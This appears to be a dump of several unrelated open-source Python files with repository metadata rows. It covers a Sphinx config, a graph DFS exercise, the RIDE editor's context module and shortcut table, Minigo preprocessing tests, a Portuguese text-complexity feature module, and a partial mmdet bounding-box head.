two_body = numpy.zeros((self.n_qubits, self.n_qubits,
self.n_qubits, self.n_qubits), float)
two_body[1, 0, 3, 2] = 1.
self.assertEqual(interaction_operator,
InteractionOperator(0.0, self.one_body, two_body))
| 42.675439 | 78 | 0.599383 | [
"Apache-2.0"
] | yudongcao/OpenFermion | src/openfermion/transforms/_jordan_wigner_test.py | 14,595 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# oz_cli documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 9 13:47:02 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
import oz_cli
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Oz the Powerful'
copyright = u"2018, Shane William Leonard"
author = u"Shane William Leonard"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = oz_cli.__version__
# The full version, including alpha/beta/rc tags.
release = oz_cli.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ---------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'oz_clidoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto, manual, or own class]).
latex_documents = [
(master_doc, 'oz_cli.tex',
u'Oz the Powerful Documentation',
u'Shane William Leonard', 'manual'),
]
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'oz_cli',
u'Oz the Powerful Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'oz_cli',
u'Oz the Powerful Documentation',
author,
'oz_cli',
'One line description of project.',
'Miscellaneous'),
]
| 29.628049 | 77 | 0.684091 | [
"MIT"
] | shaneleonard/oz | docs/conf.py | 4,859 | Python |
def dfs(graph, start, end):
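    """Iterative depth-first search over `graph` (an adjacency dict).
    Returns 1 if `end` is reachable from `start`, otherwise 0.
    """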
stack = [start]
visited = []
while stack:
        u = stack.pop()  # pop an item from the stack
visited.append(u)
if end in visited:
return 1
for v in graph[u]:
if v not in visited and v not in stack:
stack.append(v)
return 0
t = int(input())
for i in range(t):
graph = {}
node, seg = map(int, input().split())
for _ in range(seg):
a, b = map(int, input().split())
graph[a] = graph.get(a, []) + [b]
if b not in graph:
graph[b] = []
# graph[b] = graph.get(b, []) + [a]
start, end = map(int, input().split())
print(f"#{i + 1} {dfs(graph, start, end)}")
| 26.518519 | 51 | 0.480447 | [
"MIT"
] | mrbartrns/swacademy_structure | swea/stack/dfs_p1.py | 734 | Python |
# -*- coding: utf-8 -*-
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import wx
from . import logger
from ..robotapi import ROBOT_LOGGER
from ..version import VERSION
APP = None
LOG = logger.Logger()
ROBOT_LOGGER.unregister_console_logger()
ROBOT_LOGGER.register_logger(LOG)
IS_WINDOWS = os.sep == '\\'
IS_MAC = sys.platform == 'darwin'
IS_LINUX = sys.platform == 'linux'
WX_VERSION = wx.VERSION_STRING
if IS_WINDOWS:
SETTINGS_DIRECTORY = os.path.join(
os.environ['APPDATA'], 'RobotFramework', 'ride')
else:
SETTINGS_DIRECTORY = os.path.join(
os.path.expanduser('~/.robotframework'), 'ride')
LIBRARY_XML_DIRECTORY = os.path.join(SETTINGS_DIRECTORY, 'library_xmls')
if not os.path.isdir(LIBRARY_XML_DIRECTORY):
os.makedirs(LIBRARY_XML_DIRECTORY)
SETTING_EDITOR_WIDTH = 450
SETTING_LABEL_WIDTH = 150
SETTING_ROW_HEIGHT = 25
# TODO: Make this colour configurable
POPUP_BACKGROUND = (240, 242, 80) # (255, 255, 187)
POPUP_FOREGROUND = (40, 40, 0) # (255, 255, 187)
pyversion = '.'.join(str(v) for v in sys.version_info[:3])
SYSTEM_INFO = "Started RIDE %s using python version %s with wx version %s in %s." % \
(VERSION, pyversion, WX_VERSION, sys.platform)
ABOUT_RIDE = '''<h3>RIDE -- Robot Framework Test Data Editor</h3>
<p>RIDE %s running on Python %s.</p>
<p>RIDE is a test data editor for <a href="http://robotframework.org">Robot Framework</a>.
For more information, see project pages at
<a href="https://github.com/robotframework/RIDE">https://github.com/robotframework/RIDE</a>.</p>
<p>Some of the icons are from <a href="http://www.famfamfam.com/lab/icons/silk/">Silk Icons</a>.</p>
<p><br/><br/><a href="https://github.com/HelioGuilherme66">Hélio Guilherme</a> the maintainer of the project thanks the
original authors and all users and collaborators.<br/>
A very special thanks to <b><a href="https://github.com/Nyral">Nyral</a></b> and <b><a href="https://github.com/jnhyperion">Johnny.H</a></b>
the most committed in helping RIDE development and maintenance.</p>
''' % (VERSION, pyversion)
def ctrl_or_cmd():
if IS_MAC:
return wx.ACCEL_CMD
return wx.ACCEL_CTRL
def bind_keys_to_evt_menu(target, actions):
    accelerators = []
    for accel, keycode, handler in actions:
        _id = wx.NewIdRef()
        target.Bind(wx.EVT_MENU, handler, id=_id)
        accelerators.append((accel, keycode, _id))
    target.SetAcceleratorTable(wx.AcceleratorTable(accelerators))
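# Illustrative usage (hypothetical frame and handler names, not from the original source):
# bind_keys_to_evt_menu(frame, [(ctrl_or_cmd(), ord('S'), frame.on_save)])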
SHORTCUT_KEYS = '''\
<h2>Shortcut keys in RIDE</h2>
<table>
<tr align="left">
<th><b>Shortcut</b></th>
<th><b>What it does</b></th>
</tr>
<tr>
<td>CtrlCmd-S</td>
<td>Save</td>
</tr>
<tr>
<td>CtrlCmd-Shift-S</td>
<td>Save all</td>
</tr>
<tr>
<td>CtrlCmd-O</td>
<td>Open</td>
</tr>
<tr>
<td>CtrlCmd-Shift-O</td>
<td>Open directory</td>
</tr>
<tr>
<td>CtrlCmd-R</td>
<td>Open resource</td>
</tr>
<tr>
<td>Shift-CtrlCmd-R</td>
<td>Refresh directory</td>
</tr>
<tr>
<td>CtrlCmd-N</td>
<td>New project</td>
</tr>
<tr>
<td>Shift-CtrlCmd-N</td>
<td>New resource</td>
</tr>
<tr>
<td>CtrlCmd-Q</td>
<td>Quit RIDE</td>
</tr>
<tr>
<td>Alt-X</td>
<td>Go Forward</td>
</tr>
<tr>
<td>Alt-Z</td>
<td>Go Back</td>
</tr>
<tr>
<td>F6</td>
<td>Open preview</td>
</tr>
<tr>
<td>F5</td>
<td>Open search keywords dialog</td>
</tr>
<tr>
<td>F3</td>
<td>Open search tests dialog</td>
</tr>
<tr>
<td>F8</td>
<td>Run test suite</td>
</tr>
<tr>
<td>CtrlCmd-F8</td>
<td>Stop running test suite</td>
</tr>
</table>
<h3>Grid</h3>
<table>
<tr align="left">
<th><b>Shortcut</b></th>
<th><b>What it does</b></th>
</tr>
<tr>
<td>Ctrl-Space or Alt-Space</td>
<td>Suggestions and auto completion</td>
</tr>
<tr>
<td>CtrlCmd</td>
<td>Help for cell content</td>
</tr>
<tr>
<td>CtrlCmd-Shift-J</td>
<td>Pop-up JSON Editor</td>
</tr>
<tr>
<td>CtrlCmd-I</td>
<td>Insert row(s)</td>
</tr>
<tr>
<td>CtrlCmd-D</td>
<td>Remove row(s)</td>
</tr>
<tr>
<td>Shift-CtrlCmd-I</td>
<td>Insert cell(s)</td>
</tr>
<tr>
<td>Shift-CtrlCmd-D</td>
<td>Remove cell(s)</td>
</tr>
<tr>
<td>CtrlCmd-Z</td>
<td>Undo</td>
</tr>
<tr>
<td>CtrlCmd-Y</td>
<td>Redo</td>
</tr>
<tr>
<td>CtrlCmd-1</td>
<td>Make scalar variable body</td>
</tr>
<tr>
<td>CtrlCmd-2</td>
<td>Make list variable body</td>
</tr>
<tr>
<td>CtrlCmd-3</td>
<td>Comment row(s)</td>
</tr>
<tr>
<td>CtrlCmd-4</td>
<td>Uncomment row(s)</td>
</tr>
<tr>
<td>CtrlCmd-5</td>
<td>Make dictionary variable body</td>
</tr>
<tr>
<td>Alt-Up</td>
<td>Move row(s) up</td>
</tr>
<tr>
<td>Alt-Down</td>
<td>Move row(s) down</td>
</tr>
<tr>
<td>Alt-Enter</td>
<td>Move cursor down</td>
</tr>
<tr>
<td>CtrlCmd-A</td>
<td>Select all</td>
</tr>
<tr>
<td>CtrlCmd-X</td>
<td>Cut (does not remove cells or rows)</td>
</tr>
<tr>
<td>CtrlCmd-C</td>
<td>Copy</td>
</tr>
<tr>
<td>CtrlCmd-V</td>
<td>Paste (does not move cells or rows)</td>
</tr>
<tr>
<td>Shift-CtrlCmd-V</td>
<td>Insert (adds empty rows and pastes data)</td>
</tr>
<tr>
<td>Delete</td>
<td>Remove cell content</td>
</tr>
</table>
<h3>Tree view</h3>
<table>
<tr align="left">
<th><b>Shortcut</b></th>
<th><b>What it does</b></th>
</tr>
<tr>
<td>Shift-CtrlCmd-T</td>
<td>Add new test case</td>
</tr>
<tr>
<td>Shift-CtrlCmd-K</td>
<td>Add new keyword</td>
</tr>
<tr>
<td>Shift-CtrlCmd-V</td>
<td>Add new scalar variable</td>
</tr>
<tr>
<td>Shift-CtrlCmd-L</td>
<td>Add new list variable</td>
</tr>
<tr>
<td>F2</td>
<td>Rename</td>
</tr>
<tr>
<td>Shift-CtrlCmd-C</td>
<td>Clone/Copy selected keyword/test case</td>
</tr>
<tr>
<td>CtrlCmd-Up</td>
<td>Move item up</td>
</tr>
<tr>
<td>CtrlCmd-Down</td>
<td>Move item down</td>
</tr>
</table>
<h3>Text editor</h3>
<table>
<tr align="left">
<th><b>Shortcut</b></th>
<th><b>What it does</b></th>
</tr>
<tr>
<td>Ctrl-Space or Alt-Space</td>
<td>Suggestions and auto completion</td>
</tr>
<tr>
<td>CtrlCmd-T</td>
<td>Swap current row up</td>
</tr>
<tr>
<td>Tab</td>
<td>Inserts the defined number of spaces</td>
</tr>
<tr>
<td>Shift-Tab</td>
<td>Moves cursor to the left the defined number of spaces</td>
</tr>
<tr>
<td>Ctrl-MouseWheel Roll</td>
<td>Increases or Decreases font size (Zoom +/-)</td>
</tr>
<tr>
<td>CtrlCmd-F</td>
<td>Find in text</td>
</tr>
<tr>
<td>CtrlCmd-G</td>
<td>Find next search result</td>
</tr>
<tr>
<td>Shift-CtrlCmd-G</td>
<td>Find previous search result</td>
</tr>
<tr>
<td>CtrlCmd-1</td>
<td>Make scalar variable body</td>
</tr>
<tr>
<td>CtrlCmd-2</td>
<td>Make list variable body</td>
</tr>
<tr>
<td>CtrlCmd-3</td>
<td>Comment row(s)</td>
</tr>
<tr>
<td>CtrlCmd-4</td>
<td>Uncomment row(s)</td>
</tr>
<tr>
<td>CtrlCmd-5</td>
<td>Make dictionary variable body</td>
</tr>
<tr>
<td>Enter</td>
<td>When focus is in the search field, find next search result</td>
</tr>
<tr>
<td>Shift-Enter</td>
<td>When focus is in the search field, find previous search result</td>
</tr>
</table>
<h3>Run tab</h3>
<table>
<tr align="left">
<th><b>Shortcut</b></th>
<th><b>What it does</b></th>
</tr>
<tr>
<td>CtrlCmd-C</td>
<td>Copy from text output when text selected</td>
</tr>
<tr>
<td>CtrlCmd-L</td>
<td>Open HTML log</td>
</tr>
<tr>
<td>CtrlCmd-R</td>
<td>Show HTML report</td>
</tr>
<tr>
<td>Ctrl-MouseWheel Roll</td>
<td>Increases or Decreases font size (Zoom +/-)</td>
</tr>
</table>
'''
| 24.264103 | 120 | 0.537356 | [
"ECL-2.0",
"Apache-2.0"
] | HelioGuilherme66/RIDE | src/robotide/context/__init__.py | 9,464 | Python |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for preprocessing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import tempfile
import tensorflow as tf # pylint: disable=g-bad-import-order
from research.minigo import coords
from research.minigo import features
from research.minigo import go
from research.minigo import model_params
import numpy as np
from research.minigo import preprocessing
from research.minigo import utils_test
tf.logging.set_verbosity(tf.logging.ERROR)
TEST_SGF = '''(;CA[UTF-8]SZ[9]PB[Murakawa Daisuke]PW[Iyama Yuta]KM[6.5]
HA[0]RE[W+1.5]GM[1];B[fd];W[cf])'''
def create_random_data(num_examples):
raw_data = []
for _ in range(num_examples):
feature = np.random.random([
utils_test.BOARD_SIZE, utils_test.BOARD_SIZE,
features.NEW_FEATURES_PLANES]).astype(np.uint8)
pi = np.random.random([utils_test.BOARD_SIZE * utils_test.BOARD_SIZE
+ 1]).astype(np.float32)
value = np.random.random()
raw_data.append((feature, pi, value))
return raw_data
class TestPreprocessing(utils_test.MiniGoUnitTest):
def extract_data(self, tf_record, filter_amount=1):
pos_tensor, label_tensors = preprocessing.get_input_tensors(
model_params.DummyMiniGoParams(), 1, [tf_record], num_repeats=1,
shuffle_records=False, shuffle_examples=False,
filter_amount=filter_amount)
recovered_data = []
with tf.Session() as sess:
while True:
try:
pos_value, label_values = sess.run([pos_tensor, label_tensors])
recovered_data.append((
pos_value,
label_values['pi_tensor'],
label_values['value_tensor']))
except tf.errors.OutOfRangeError:
break
return recovered_data
def assertEqualData(self, data1, data2):
# Assert that two data are equal, where both are of form:
# data = List<Tuple<feature_array, pi_array, value>>
self.assertEqual(len(data1), len(data2))
for datum1, datum2 in zip(data1, data2):
# feature
self.assertEqualNPArray(datum1[0], datum2[0])
# pi
self.assertEqualNPArray(datum1[1], datum2[1])
# value
self.assertEqual(datum1[2], datum2[2])
def test_serialize_round_trip(self):
np.random.seed(1)
raw_data = create_random_data(10)
tfexamples = list(map(preprocessing.make_tf_example, *zip(*raw_data)))
with tempfile.NamedTemporaryFile() as f:
preprocessing.write_tf_examples(f.name, tfexamples)
recovered_data = self.extract_data(f.name)
self.assertEqualData(raw_data, recovered_data)
def test_filter(self):
raw_data = create_random_data(100)
tfexamples = list(map(preprocessing.make_tf_example, *zip(*raw_data)))
with tempfile.NamedTemporaryFile() as f:
preprocessing.write_tf_examples(f.name, tfexamples)
recovered_data = self.extract_data(f.name, filter_amount=.05)
self.assertLess(len(recovered_data), 50)
def test_serialize_round_trip_no_parse(self):
np.random.seed(1)
raw_data = create_random_data(10)
tfexamples = list(map(preprocessing.make_tf_example, *zip(*raw_data)))
with tempfile.NamedTemporaryFile() as start_file, \
tempfile.NamedTemporaryFile() as rewritten_file:
preprocessing.write_tf_examples(start_file.name, tfexamples)
# We want to test that the rewritten, shuffled file contains correctly
# serialized tf.Examples.
batch_size = 4
batches = list(preprocessing.shuffle_tf_examples(
1000, batch_size, [start_file.name]))
# 2 batches of 4, 1 incomplete batch of 2.
self.assertEqual(len(batches), 3)
# concatenate list of lists into one list
all_batches = list(itertools.chain.from_iterable(batches))
for _ in batches:
preprocessing.write_tf_examples(
rewritten_file.name, all_batches, serialize=False)
original_data = self.extract_data(start_file.name)
recovered_data = self.extract_data(rewritten_file.name)
# stuff is shuffled, so sort before checking equality
def sort_key(nparray_tuple):
return nparray_tuple[2]
original_data = sorted(original_data, key=sort_key)
recovered_data = sorted(recovered_data, key=sort_key)
self.assertEqualData(original_data, recovered_data)
def test_make_dataset_from_sgf(self):
with tempfile.NamedTemporaryFile() as sgf_file, \
tempfile.NamedTemporaryFile() as record_file:
sgf_file.write(TEST_SGF.encode('utf8'))
sgf_file.seek(0)
preprocessing.make_dataset_from_sgf(
utils_test.BOARD_SIZE, sgf_file.name, record_file.name)
recovered_data = self.extract_data(record_file.name)
start_pos = go.Position(utils_test.BOARD_SIZE)
first_move = coords.from_sgf('fd')
next_pos = start_pos.play_move(first_move)
second_move = coords.from_sgf('cf')
expected_data = [
(
features.extract_features(utils_test.BOARD_SIZE, start_pos),
preprocessing._one_hot(utils_test.BOARD_SIZE, coords.to_flat(
utils_test.BOARD_SIZE, first_move)), -1
),
(
features.extract_features(utils_test.BOARD_SIZE, next_pos),
preprocessing._one_hot(utils_test.BOARD_SIZE, coords.to_flat(
utils_test.BOARD_SIZE, second_move)), -1
)
]
self.assertEqualData(expected_data, recovered_data)
if __name__ == '__main__':
tf.test.main()
| 39.64497 | 83 | 0.647015 | [
"Apache-2.0"
] | jdavidagudelo/tensorflow-models | research/minigo/preprocessing_test.py | 6,700 | Python |
# -*- coding: utf-8 -*-
"""
Created by Lucas Fonseca Lage on 04/03/2020
"""
import re, os, spacy
import numpy as np
from my_wsd import my_lesk
from unicodedata import normalize
from document import Document
from gensim.models import Phrases
from nltk.corpus import wordnet as wn  # used by synset_count and hypo_hyper_count
# Load the spaCy model
nlp = spacy.load('pt_core_news_lg')
# Load the bigram and trigram models (required by bi_trigram_counter)
#bigram_model = Phrases.load('./n_gram_models/bigram_gen_model')
#trigram_model = Phrases.load('./n_gram_models/trigram_gen_model')
freq_pos_tag = [('DET', 'NOUN', 'ADP', 'NOUN', 'ADP', 'DET', 'NOUN'),
('VERB', 'DET', 'NOUN', 'ADP', 'NOUN', 'ADP', 'NOUN'),
('VERB', 'DET', 'NOUN', 'ADP', 'DET', 'NOUN', 'PUNCT'),
('DET', 'NOUN', 'ADP', 'NOUN', 'ADP', 'NOUN', 'PUNCT'),
('NOUN', 'ADP', 'NOUN', 'ADP', 'DET', 'NOUN', 'PUNCT'),
('VERB', 'ADP', 'DET', 'NOUN', 'ADP', 'NOUN', 'PUNCT'),
('VERB', 'DET', 'NOUN', 'ADP', 'NOUN', 'ADP', 'DET'),
('DET', 'NOUN', 'ADP', 'DET', 'NOUN', 'ADP', 'NOUN'),
('NOUN', 'ADP', 'DET', 'NOUN', 'ADP', 'NOUN', 'PUNCT'),
('VERB', 'DET', 'NOUN', 'ADP', 'NOUN', 'ADJ', 'PUNCT')]
def corpus_reader(path):
    '''Walks the path given as `path` looking for .xml files. Returns a tuple
    of two lists: one with the paths to the .xml files and the other with the
    Document objects created from each .xml file
'''
prog = re.compile('(\.xml)$')
doc_list = []
f = []
fps = []
for dirpath, dirnames, filenames in os.walk(path):
for filename in filenames:
fps.append(os.path.normpath(os.path.join(dirpath,filename)))
for path in fps:
if re.search(prog,path):
f.append(path)
doc_list.append(Document(path))
return (f, doc_list)
def corpus_yeeter(path):
    '''Similar to corpus_reader. Takes the path to the folder containing the
    corpus and creates a generator. Each iteration yields a tuple with the
    path to an .xml file and the Document object created from it
'''
prog = re.compile('(\.xml)$')
for dirpath, dirnames, filenames in os.walk(path):
for filename in filenames:
if re.search(prog,filename):
path = os.path.normpath(os.path.join(dirpath,filename))
yield (path, Document(path))
def all_fps(path_to_dir):
    '''Takes the path to a directory and returns a list with the absolute
    paths of the files inside it
'''
fps = []
for dirpath, dirnames, filenames in os.walk(path_to_dir):
for filename in filenames:
fps.append(os.path.normpath(os.path.join(dirpath,filename)))
return fps
def remover_acentos(text):
    '''Removes the accents from the string "text". Used only by pre_process
'''
return normalize('NFKD', text).encode('ASCII', 'ignore').decode('ASCII')
def pre_process(text):
    '''Pre-processes the input string "text": lowercases it, collapses extra
    whitespace and removes numbers, punctuation and accents
'''
text = re.sub('\s{2,}',' ',text).strip().lower()
doc = nlp(text)
    # Keep only alphabetic, non-punctuation tokens (drops numbers)
text = ' '.join([token.text for token in doc if token.is_alpha == True
and token.pos_ != 'PUNCT'])
return remover_acentos(text)
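# Example (illustrative; the exact tokens depend on the spaCy model):
# pre_process("Olá,   mundo 123!") -> "ola mundo"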
def bi_trigram_counter(sentence_list):
"""Retorna uma tupla com o numero de bigramas e trigramas.
Recebe como entrada o texto segmentado em uma lista de sentencas.
"""
bi_sent_list = []
tri_sent_list = []
for sentence in sentence_list:
proc_sent = pre_process(sentence).lower().split()
bigram_sentence = bigram_model[proc_sent]
bi_sent_list.append(bigram_sentence)
for bi_sent in bi_sent_list:
tri_sent = trigram_model[bi_sent]
tri_sent_list.append(tri_sent)
return(bigram_number(bi_sent_list),trigram_number(tri_sent_list))
def bigram_number(bigram_sent_list):
    '''Counts the bigrams found in the essay (gensim Phrases joins collocations
    with "_"). Takes a list of the sentences that make up the essay.
'''
count = 0
for sent in bigram_sent_list:
for token in sent:
if re.search(u'_',token):
count += 1
return count
def trigram_number(trigram_sent_list):
    '''Counts the trigrams found in the essay. Takes a list of the sentences
    that make up the essay
'''
count = 0
for sent in trigram_sent_list:
for token in sent:
if re.search('(?<=_).+_',token):
count += 1
return count
def n_most_freq_pos_tag_seq(sent_list):
    ''' Searches the sentence list for the most frequent POS-tag sequences
    (freq_pos_tag above) and returns how many were found.
'''
n = 0
pos_list = []
for i in sent_list:
sent_nlp = nlp(i)
sent_pos = []
for token in sent_nlp:
sent_pos.append(token.pos_)
pos_list.append(sent_pos)
for line in pos_list:
if len(line) < 7:
continue
if len(line) >= 7:
while len(line) >= 7:
t = tuple(line[0:7])
if t in freq_pos_tag:
n+=1
line.pop(0)
return n
def subj_n_elements(sentence_list):
    ''' Takes the list of sentences of the essay. Counts the elements below
    each subject in the syntactic tree produced by the spaCy dependency
    parser. Returns the number of subjects with 7 or more elements and the
    total number of elements that belong to a subject in the whole essay.
'''
r_list = []
for spacy_doc in nlp.pipe(sentence_list):
big_subj = 0
subj_el_total = 0
for token in spacy_doc:
if token.dep_ == 'nsubj':
size = len([desc for desc in token.subtree if desc.is_alpha])
if size >= 7:
big_subj += 1
subj_el_total += size
r_list.append((big_subj,subj_el_total))
return tuple([sum(i) for i in zip(*r_list)])
def synset_count(sent_list, lang='por', pos='NOUN'):
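    '''Counts the WordNet synsets of every token with the given POS tag in the
    sentence list. Returns the total count and the average per sentence.
    '''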
i = 0
for spacy_doc in nlp.pipe(sent_list):
for token in spacy_doc:
if token.pos_ == pos:
i += len(wn.synsets(token.text, lang=lang))
return (i, i/len(sent_list))
def hypo_hyper_count(sent_list):
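    '''For each noun, counts the hypernyms and hyponyms of the synset chosen by
    my_lesk. Returns (hypernym total, hypernym average, hyponym total,
    hyponym average) over the sentence list.
    '''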
hyper = []
hypo = []
size = len(sent_list)
for sent in nlp.pipe(sent_list):
ss = [my_lesk(sent,token.text) for token in sent if token.pos_=='NOUN']
for s in ss:
try:
hyper.append(len(s.hypernyms()))
hypo.append(len(s.hyponyms()))
except AttributeError:
continue
h_er_sum = sum(hyper)
h_o_sum = sum(hypo)
return(h_er_sum,h_er_sum/size, h_o_sum,h_o_sum/size)
| 33.725 | 80 | 0.621794 | [
"MIT"
] | lflage/complexidade_textual | complexidade_textual.py | 6,783 | Python |
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2013 NTT MCL, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
from openstack_dashboard.dashboards.admin import dashboard
import horizon
class NetworkTopology(horizon.Panel):
name = _("Network Topology")
slug = 'network_topology'
permissions = ('openstack.services.network', )
#dashboard.Admin.register(Networks)
| 36.2 | 78 | 0.753223 | [
"Apache-2.0"
] | xuweiliang/Codelibrary | openstack_dashboard/dashboards/admin/network_topology/panel.py | 1,086 | Python |
import itertools
def erat2():
D = {}
yield 2
for q in itertools.islice(itertools.count(3), 0, None, 2):
p = D.pop(q, None)
if p is None:
D[q*q] = q
yield q
else:
x = p + q
while x in D or not (x&1):
x += p
D[x] = p
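# Usage sketch (added for illustration, not part of the original recipe): the
# generator is infinite, so slice it to take a finite prefix of primes.
if __name__ == '__main__':
    print(list(itertools.islice(erat2(), 10)))  # [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]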
| 22.142857 | 62 | 0.367742 | [
"Apache-2.0"
] | asukumari/python-cookbook-2e-alexmartelli | cb2_examples/cb2_18_10_exm_2.py | 310 | Python |
import torch.nn as nn
from mmcv.cnn import ConvModule
from mmdet.models.builder import HEADS
from .bbox_head import BBoxHead
@HEADS.register_module()
class ConvFCBBoxHeadSeparate(BBoxHead):
r"""More general bbox head, with shared conv and fc layers and two optional
separated branches.
.. code-block:: none
/-> cls convs -> cls fcs -> cls
shared convs -> shared fcs
\-> reg convs -> reg fcs -> reg
""" # noqa: W605
def __init__(self,
num_shared_convs=0,
num_shared_fcs=0,
num_cls_convs=0,
num_cls_fcs=0,
num_reg_convs=0,
num_reg_fcs=0,
conv_out_channels=256,
fc_out_channels=1024,
conv_cfg=None,
norm_cfg=None,
*args,
**kwargs):
super(ConvFCBBoxHeadSeparate, self).__init__(*args, **kwargs)
assert (num_shared_convs + num_shared_fcs + num_cls_convs +
num_cls_fcs + num_reg_convs + num_reg_fcs > 0)
if num_cls_convs > 0 or num_reg_convs > 0:
assert num_shared_fcs == 0
if not self.with_cls:
assert num_cls_convs == 0 and num_cls_fcs == 0
if not self.with_reg:
assert num_reg_convs == 0 and num_reg_fcs == 0
self.num_shared_convs = num_shared_convs
self.num_shared_fcs = num_shared_fcs
self.num_cls_convs = num_cls_convs
self.num_cls_fcs = num_cls_fcs
self.num_reg_convs = num_reg_convs
self.num_reg_fcs = num_reg_fcs
self.conv_out_channels = conv_out_channels
self.fc_out_channels = fc_out_channels
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
# add shared convs and fcs
self.shared_convs, self.shared_fcs, last_layer_dim = \
self._add_conv_fc_branch(
self.num_shared_convs, self.num_shared_fcs, self.in_channels,
True)
self.shared_out_channels = last_layer_dim
# add cls specific branch
self.cls_convs, self.cls_fcs, self.cls_last_dim = \
self._add_conv_fc_branch(
self.num_cls_convs, self.num_cls_fcs, self.shared_out_channels)
# add reg specific branch
self.reg_convs, self.reg_fcs, self.reg_last_dim = \
self._add_conv_fc_branch(
self.num_reg_convs, self.num_reg_fcs, self.shared_out_channels)
if self.num_shared_fcs == 0 and not self.with_avg_pool:
if self.num_cls_fcs == 0:
self.cls_last_dim *= self.roi_feat_area
if self.num_reg_fcs == 0:
self.reg_last_dim *= self.roi_feat_area
self.relu = nn.ReLU(inplace=True)
# reconstruct fc_cls and fc_reg since input channels are changed
if self.with_cls:
self.fc_cls = nn.Linear(self.cls_last_dim, self.num_classes + 1)
if self.with_reg:
out_dim_reg = (4 if self.reg_class_agnostic else 4 *
self.num_classes)
self.fc_reg = nn.Linear(self.reg_last_dim, out_dim_reg)
def _add_conv_fc_branch(self,
num_branch_convs,
num_branch_fcs,
in_channels,
is_shared=False):
"""Add shared or separable branch
convs -> avg pool (optional) -> fcs
"""
last_layer_dim = in_channels
# add branch specific conv layers
branch_convs = nn.ModuleList()
if num_branch_convs > 0:
for i in range(num_branch_convs):
conv_in_channels = (
last_layer_dim if i == 0 else self.conv_out_channels)
branch_convs.append(
ConvModule(
conv_in_channels,
self.conv_out_channels,
3,
padding=1,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg))
last_layer_dim = self.conv_out_channels
# add branch specific fc layers
branch_fcs = nn.ModuleList()
if num_branch_fcs > 0:
# for shared branch, only consider self.with_avg_pool
